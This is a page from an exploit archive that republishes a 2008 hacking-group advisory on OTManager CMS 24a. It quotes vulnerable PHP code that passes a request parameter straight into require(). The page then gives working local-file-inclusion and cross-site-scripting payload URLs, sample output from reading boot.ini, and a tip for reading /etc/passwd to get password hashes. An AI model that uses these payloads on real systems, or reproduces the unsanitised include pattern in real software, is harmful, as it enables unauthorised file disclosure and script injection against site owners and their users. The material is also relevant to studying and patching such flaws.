Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : ExploitAlert

  Topic : OTManager CMS 24a (LFI/XSS) Multiple Remote Vulnerabilities
  ExploitAlert : 4214
  Milw0rm ID : 5957
  Credit : CWH Underground
  Date : 29.6.2008

  Download

  Exploit Code :  

===========================================================
OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team
..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'


AUTHOR : CWH Underground
DATE : 27 June 2008
SITE : cwh.citec.us


#####################################################
APPLICATION : OTManager CMS
VERSION : 24a Completo
VENDOR : http://www.otmanager.org/
DOWNLOAD :
http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

76: if($_REQUEST['conteudo']==""){
77: require("Principal.php");
78: }else{
79: if(!file_exists($_REQUEST['conteudo'].".php")){
80: echo '<center><font size="3"><b>404 URL
Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao
Lado.</center>';
81: }else{
82: require($_REQUEST['conteudo'].".php");
83: }
84: }


---------
Exploit
---------

#####
LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]


This exploit will open boot.ini in system file:

[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems]
multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP
Professional" /noexecute=optin /fastdetect

You can change boot.ini to /etc/passwd%00 in linux OS, For view pass
hash.

#####
XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
POC Exploit
-------------

#####
LFI
#####

[+]
http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../b
oot.ini%00

#####
XSS
#####

[+]
http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XS
S test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################



Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.